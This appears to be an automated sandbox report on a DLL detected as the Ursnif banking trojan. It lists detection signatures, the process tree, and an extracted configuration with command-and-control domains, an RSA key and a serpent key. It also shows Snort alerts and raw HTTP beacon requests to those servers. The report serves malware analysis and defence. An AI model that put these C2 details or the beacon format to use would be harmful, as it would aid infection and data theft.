Windows Analysis Report a04.dll

Overview

General Information

Sample Name:a04.dll
Analysis ID:498854
MD5:a04cc72f0946720cc875ed228f565c1d
SHA1:58b12ddffb7015e8857209c60a06ed4419a23641
SHA256:e04823c56b627e74c92656340de38aed9804af65040bbed746b206de5a122dc5
Tags:dll
Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Writes or reads registry keys via WMI
Machine Learning detection for sample
Writes registry values via WMI
Uses 32bit PE files
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Contains functionality to read the PEB
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5692 cmdline: loaddll32.exe 'C:\Users\user\Desktop\a04.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 5052 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\a04.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 3436 cmdline: rundll32.exe 'C:\Users\user\Desktop\a04.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 1576 cmdline: regsvr32.exe /s C:\Users\user\Desktop\a04.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • iexplore.exe (PID: 2792 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 5300 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4184 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:82960 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4044 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:17424 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5264 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:17432 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 3604 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:82984 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • rundll32.exe (PID: 3160 cmdline: rundll32.exe C:\Users\user\Desktop\a04.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "J1v92dmlHEXvTq5f5j3hHqD70axrY5eELvziRmk2ZRpplesdH60SWuvAeSoVjaz9ziV8nMt5HZ9yXir8qEhrqq8hQHTJhjrVOT9MbyGYWfZYzeSsY3rIzsZwtP29YyBAT1PpSvyXXlCPmJQXR5Q//8WQgOVDWmVCE+/SpgqvzveosdxnJtgxBktD7wgQNaGVGyH4OJZNZ9g7ljttRKxaL0JCbq13a39yNbpeHzFOy2LZ195Kd7DQep1KcpDmTFkXlvhDjwtk01EiI8xQCLM1y7h+pPXaP6XItJoqiCYUm0VCZWC2PaDptTz+jxtvWnkZONCsmfIGHURcctQ1Ek8LULijbdhGJZWpF2GtQXrTyK4=", "c2_domain": ["app10.laptok.at", "apt.feel500.at", "init.in100k.at"], "botnet": "1500", "server": "580", "serpent_key": "dHCsos5nQ1EGXxPs", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000003.908592285.0000000005AF8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000002.00000003.986796014.0000000005568000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000005.00000003.919043739.0000000004FF8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000002.00000003.986936455.0000000005568000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000002.00000003.986844701.0000000005568000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

            Unpacked PEs

Source | Rule | Description | Author | Strings
3.2.rundll32.exe.32e0000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
5.2.rundll32.exe.6b0000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.2.loaddll32.exe.6e050000.2.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.2.loaddll32.exe.fc0000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
5.2.rundll32.exe.6e050000.2.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      AV Detection:

Found malware configuration
Source: 00000002.00000003.800171088.0000000000BB0000.00000040.00000001.sdmp | Malware Configuration Extractor: Ursnif (same configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: a04.dll | Virustotal: Detection: 59%
Source: a04.dll | Metadefender: Detection: 17%
Source: a04.dll | ReversingLabs: Detection: 71%
Antivirus detection for URL or domain
Source: http://app10.laptok.at/KiETfhAdcEl7/hLoS0_2BEdS/nu4Yf9GnANVyXk/YgUltJ7zs6xEJ2nloxeBs/eATUXgJAO922GcgP/GiUgV17y_2BdX4O/qFWwhpMGMf37wi_2BX/lkJe3cdrN/7WVmaELlUteTQIErFhWc/URRkn6I1CeKadfr0Tg_/2BWPYNHHR_2F2UImJAlhjY/i7YonJ3Ydwnd_/2BgOgiB9/MYuujPMMxg18nymjpE2JqFD/0fVq8D9YsD/phg5UsKLZOQl7kqi1/VTS_2FsAFu3G/3TrEzzwsBKW/3MeaiWTLCHCZlD/OY9S51u3L9nBtrZ_2BZx7/0yqRxDj4x6MboGVE/Q0bFKfsJ98F/gfX | Avira URL Cloud: Label: malware
Source: http://app10.laptok.at/favicon.ico | Avira URL Cloud: Label: malware
Source: http://app10.laptok.at/tej6GHOV/2OZDNZM15j8d4LuzyBm1CPL/pFWNHMsgBq/Me_2BiCKfGmnsgtGg/Rke8C0lda6 | Avira URL Cloud: Label: malware
Source: http://app10.laptok.at/iyCuS9ekK6/ZKYlS2pL4_2F6YN5g/m2OzU2ez_2Fk/8F_2BnXwn7_/2BP90eUCGBXbRD/RIrhhRbI | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: app10.laptok.at | Virustotal: Detection: 12%
Machine Learning detection for sample
Source: a04.dll | Joe Sandbox ML: detected
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00FC35A1 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_00FC35A1
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_00A735A1 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,2_2_00A735A1
Source: a04.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: a04.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Month\quick-major\729\Key\key.pdb source: rundll32.exe, a04.dll
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00FC4E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_00FC4E9C
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_00A74E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_00A74E9C

                      Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49936 -> 87.106.18.141:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49936 -> 87.106.18.141:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49961 -> 87.106.18.141:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49961 -> 87.106.18.141:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49965 -> 87.106.18.141:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49997 -> 87.106.18.141:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49997 -> 87.106.18.141:80
Source: Joe Sandbox View | JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: Joe Sandbox View | IP Address: 172.67.69.19
Source: {F1E5E2AE-2775-11EC-90EB-ECF4BBEA1588}.dat.4.dr | String found in binary or memory: http://app10.laptok.at/KiETfhAdcEl7/hLoS0_2BEdS/nu4Yf9GnANVyXk/YgUltJ7zs6xEJ2nloxeBs/eATUXgJAO922Gcg
Source: {F1E5E2AC-2775-11EC-90EB-ECF4BBEA1588}.dat.4.dr, ~DF089A6B92B8B468A8.TMP.4.dr | String found in binary or memory: http://app10.laptok.at/PdcGcGQosorY2QVhs_2/Bq9ScRQL0MmNo2gJrOrbiG/FDPb27Vu9hQGu/uY_2BMGI/NhNPnwzZnvY
Source: loaddll32.exe, 00000000.00000003.862593152.0000000001258000.00000004.00000001.sdmp, ~DFBF4FFB19552D8CDC.TMP.4.dr, {E5354AB5-2775-11EC-90EB-ECF4BBEA1588}.dat.4.dr | String found in binary or memory: http://app10.laptok.at/iyCuS9ekK6/ZKYlS2pL4_2F6YN5g/m2OzU2ez_2Fk/8F_2BnXwn7_/2BP90eUCGBXbRD/RIrhhRbI
Source: loaddll32.exe, 00000000.00000002.1181563164.0000000001760000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.1182344208.00000000031F0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1182967138.0000000003940000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.1182457266.00000000031F0000.00000002.00020000.sdmp | String found in binary or memory: http://app10.laptok.at/tej6GHOV/2OZDNZM15j8d4LuzyBm1CPL/pFWNHMsgBq/Me_2BiCKfGmnsgtGg/Rke8C0lda6
Source: {078013E1-2776-11EC-90EB-ECF4BBEA1588}.dat.4.dr, ~DFF3589949295E4D6F.TMP.4.dr | String found in binary or memory: http://app10.laptok.at/tej6GHOV/2OZDNZM15j8d4LuzyBm1CPL/pFWNHMsgBq/Me_2BiCKfGmnsgtGg/Rke8C0lda6PN/mY
                      Source: de-ch[1].htm.6.drString found in binary or memory: http://ogp.me/ns#
                      Source: de-ch[1].htm.6.drString found in binary or memory: http://ogp.me/ns/fb#
                      Source: auction[1].htm.6.drString found in binary or memory: http://popup.taboola.com/german
                      Source: {AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat.4.drString found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
                      Source: msapplication.xml.4.drString found in binary or memory: http://www.amazon.com/
                      Source: msapplication.xml1.4.drString found in binary or memory: http://www.google.com/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
                      Source: msapplication.xml2.4.drString found in binary or memory: http://www.live.com/
                      Source: msapplication.xml3.4.drString found in binary or memory: http://www.nytimes.com/
                      Source: msapplication.xml4.4.drString found in binary or memory: http://www.reddit.com/
                      Source: msapplication.xml5.4.drString found in binary or memory: http://www.twitter.com/
                      Source: msapplication.xml6.4.drString found in binary or memory: http://www.wikipedia.com/
                      Source: msapplication.xml7.4.drString found in binary or memory: http://www.youtube.com/
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://amzn.to/2TTxhNg
                      Source: auction[1].htm.6.drString found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&amp;ap
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://apps.apple.com/ch/app/microsoft-news/id945416273?pt=80423&amp;ct=prime_footer&amp;mt=8
                      Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
                      Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
                      Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_office&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_store&amp;m
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_promotionalstripe_na
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://client-s.gateway.messenger.live.com
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://clk.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=21863656
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24545562
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=295926&amp;a=3064090&amp;g=24886692
                      Source: {AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat.4.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;http
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;http
                      Source: {AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                      Source: {AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                      Source: {AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat.4.drString found in binary or memory: https://contextualtag.media.net
                      Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                      Source: auction[1].htm.6.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1633614702&amp;rver=7.0.6730.0&am
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/logout.srf?ct=1633614703&amp;rver=7.0.6730.0&amp;lc=1033&amp;id=1184&amp;lru=
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1633614702&amp;rver=7.0.6730.0&amp;w
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/#qt=mru
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/about/en/download/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com;Fotos
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com;OneDrive-App
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://outlook.com/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://outlook.live.com/calendar
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png&quot;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&amp;hl=de-ch&amp;refer
                      Source: {AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat.4.drString found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://secure.adnxs.com/clktrb?id=762232
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-me
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-nav
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlink
                      Source: imagestore.dat.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAPaLRV.img?h=368&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXBV1.img?h=27&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&amp;w
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&amp;w
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://support.skype.com
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://twitter.com/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://twitter.com/i/notifications;Ich
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;a
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopa
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-river
                      Source: iab2Data[2].json.6.drString found in binary or memory: https://www.bidstack.com/privacy-policy/
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ebay.ch/?mkcid=1&amp;mkrid=5222-53480-19255-0&amp;siteid=193&amp;campid=5338626668&amp;t
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/
                      Source: {AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat.4.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsb
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/finanzen/nachrichten/schweizer-arbeitsmarkt-auf-dem-weg-zum-vorkrisennivea
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/schweiz/bund-registriert-erneut-weniger-neue-corona-ansteckung
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/apps-bieten-nur-oberfl%c3%a4chlichen-zugang-zum-gegen%c3%bcber/
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/auto-nach-unfall-mit-milit%c3%a4rblachen-abgedeckt/ar-AALgoO8?o
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/die-araberinnen-und-araber-kehren-zur%c3%bcck/ar-AAPbaLO?ocid=h
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/gericht-verurteilt-mehrfachen-raser-zu-30-monaten-freiheitsstra
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/mann-54-wird-von-wurzelstock-getroffen-und-kommt-ums-leben/ar-A
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/schulleitung-warnt-eltern-vor-lebensbedrohlichem-ohnmacht-spiel
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/spezialisten-suchen-mit-sonarsonde-in-200-metern-tiefe-nach-ver
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/was-passierte-nur-drei-minuten-nach-dem-start/ar-AAP7LCM?ocid=h
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/sport?ocid=StripeOCID
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msn
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_d
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_shop_de&amp;utm
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skype.com/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/de
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/de/download-skype
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
                      Source: iab2Data[2].json.6.drString found in binary or memory: https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json
                      Source: iab2Data[2].json.6.drString found in binary or memory: https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
                      Source: unknown. DNS traffic detected: queries for: www.msn.com
                      Source: global trafficHTTP traffic detected: GET /iyCuS9ekK6/ZKYlS2pL4_2F6YN5g/m2OzU2ez_2Fk/8F_2BnXwn7_/2BP90eUCGBXbRD/RIrhhRbIti7z5YuR4sWSi/epontKgntd3dejbE/4HUFCBnhPXzMXu2/uZ4C1mmtL8vyVF2uY5/jVMd1l3Jh/x4JupkgAYc9HSuaowzvE/VVWENV7cepnquu_2Fad/hpeYK_2BWzJKa_2BOghWOX/oxGEacWNQdGQC/A6Cks_2F/uCy09i_2F1Tm3pYwDufmBHp/hIUmxpzNN2/hckwDljGIXjYYf_2F/CNoayANu_2Bs/LgXcLBGeCG9/yBRWVpnUTSUqib2fLN/OUCgu HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app10.laptok.atConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: app10.laptok.atConnection: Keep-Alive
